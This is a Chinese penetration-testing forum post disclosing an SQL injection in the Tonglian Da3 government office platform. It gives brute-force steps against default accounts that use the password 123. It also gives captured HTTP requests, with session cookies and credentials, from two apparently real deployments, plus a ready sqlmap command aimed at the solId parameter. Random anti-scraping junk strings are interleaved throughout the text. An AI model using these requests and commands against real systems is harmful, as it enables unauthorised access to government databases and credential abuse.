中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin 时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

3 q& e* Q# h8 k( H. V7 t9 I* T. u; K
8 ~0 x2 ~. _; d' s1 _2 K

/ j8 T& v+ _' I) w+ f6 i 平台简介： ( a' J7 {2 u3 z6 j7 V3 ~& i1 A

% J, e0 H/ z. ]# A( [5 `" A # Q) Q4 h& R. S, o4 E

b4 R- T) r9 d# t5 f. r' o$ \0 z8 j! Z 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
3 [+ B8 P, R1 H 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
7 ^- k3 ~# O" Q6 Z3 c {& w5 a2 c同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ ! m, N6 t- t: Y

' S% `! O0 c! j6 g4 r- N) i R3 D' N/ U5 Y* \1 X

h' G8 C/ e7 r0 Y! ~) ^3 j 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址：; `) V, f4 _4 F; K0 g( m

: d7 g7 L& S7 i + M5 h. Z! X6 s4 [) v2 H+ X; `

1 Q$ I3 w! K2 _6 d$ n. v7 w4 d) i http://1.1.1.1:7197/cap-aco/#（案例2-）+ K' F7 L& b1 Q+ [

' E! h3 z: a7 V1 y2 W( d+ o http://www.XXOO.com （案例1-官网网站） ( ^1 {% U+ D [& \4 i

# `1 _% V2 p! ~2 r3 Y 4 E( H$ ~( U7 `

) S6 o. Y4 k! a' j 漏洞详情: \4 o4 S4 i2 Z) d$ E" w

6 M4 S& J5 R r1 ^ 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试 - D: S% z% |& n: y3 Z$ o

8 P7 z* ~& X3 I- I3 {* f* e! R5 H/ b 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图： $ Q: K; q9 O% |% o

1 @# \% q" J3 _1 f* H! F( c0 u0 c" ` & D4 U" B6 E2 J: T9 M; i

. S4 `6 ]0 ?; T* f. K7 l % ?( F# l* Y) E) _

* n3 H f* D' b2 k status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： ( g: ]3 F- P0 n y5 j8 ?3 G

1 c/ V: P7 m6 d1 r' J5 u 1、案例1-官方网站 _8 C' r; u; r- \

$ r4 y# m+ [' c( g E; ^6 a# {* F2 p# A GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1# \4 P. c+ m: S; H0 I& R B8 w4 W. o

! e- `" a. j. q/ i& t0 @ Host: www.XXOO.com " L% Q6 R% Y# _+ p; [. H4 g+ \2 L

+ k3 o' s4 z. G. Q, o) M, z5 U- Z Proxy-Connection: Keep-Alive# U4 E& Q x* `0 [+ G

; V& n* S+ h! I Accept: application/json, text/javascript, */*; q=0.01, v# o- ?" b4 g: N

9 [% d7 f. k- S4 ` Accept-Language: zh-CN 6 U/ m6 c% I" b ^% h

, G3 S' l( O7 _- S Content-Type: application/json8 H+ L- t+ Z# ?3 W8 H' ^+ Y

6 S+ R& T: }$ A+ Y5 f* M+ n User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko , G6 }# z% P" o5 r2 `* r5 r- K

% R2 j& g: a/ P X-Requested-With: XMLHttpRequest * E2 u& p, ]( p8 x8 I$ ^

M: J% O- y) p% L" K; F! R! ~ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0029 |6 P; Q& q( s8 i# X" |) x

+ p [* u W) T& w Accept-Encoding: gzip, deflate, sdch 9 |. K) w0 l( f4 _- `7 P

9 r0 r5 K6 P1 L; h4 v+ J Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e, v, J" D6 F" _5 d- S R7 y

8 C3 ?- P$ W. L1 N) p: R! U 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:6 }" `% a: U" Z3 P7 O6 Y

4 J- f- ~9 X. V( n* I: w + r3 z& L5 x; m0 x) [4 i

$ Z- B9 k8 r }3 x3 h 5 D% z7 {8 @5 z3 s# t: r( l/ E

% u9 s/ ?5 o' j( U, V ( T- t( z( P7 n+ Y

R, d; P3 R& M5 g: p; u0 i5 ?2 G * F: ^, ~6 _. F H6 m3 k5 N4 s+ ?

9 ~# K: F: k9 n K) f 0 Y5 c9 d- e* w2 `2 o

4 z: r( H- [4 _$ r 2、案例2-某天河云平台- `1 T( r U/ l# T; |

9 e: n4 y; Z; [( M GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.10 D/ {1 }, O$ b

) K2 z0 v1 Z, @3 y+ M2 H! O Host: 1.1.1.:7197" Z6 x1 H$ s. f5 N7 k* F) Z7 U; q

. v1 b, \' c' h, k# F Accept: application/json, text/javascript, */*; q=0.01 2 |2 |! R* Z( M

1 c; G7 c. t4 o: [8 T$ `& B5 C X-Requested-With: XMLHttpRequest( U5 W% I3 D: l7 `

, S1 V! v/ _* U3 e4 U, } User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 3 u( j$ t& D7 j; h$ O; | X7 h% ]

6 ]" G2 n- A; _ c6 J Content-Type: application/json, c/ B; V1 |6 L9 w

g/ I9 d0 O( Z+ m" g Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 # X5 v/ ?* G/ k0 \$ N# d7 Q$ u

. o+ g W l4 I0 }. B Accept-Language: zh-CN,zh;q=0.80 O! U8 ]% a( K1 Y9 c

# p, W# Q0 i0 ?6 o ?$ e- X( ?) J Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1, q8 ]' z) V1 |9 A9 Z8 r

. ?. Z0 y- U- Y0 |8 n1 P Connection: close % c5 O- R7 [* W/ l' X% S

+ P; b7 ^/ \4 M8 k2 ^/ M1 ~- R t$ F 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: : x w4 j- P. I; V* Z8 Y

0 @4 P% w( p, p4 ^* n# G) \% w G. ~7 { ' d: P9 U" n/ [/ m5 Z3 r( h* ^6 Z p6 M

. `- v) p8 y& M& d1 I9 \. I# A4 E
3 C/ N/ v8 J1 I

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)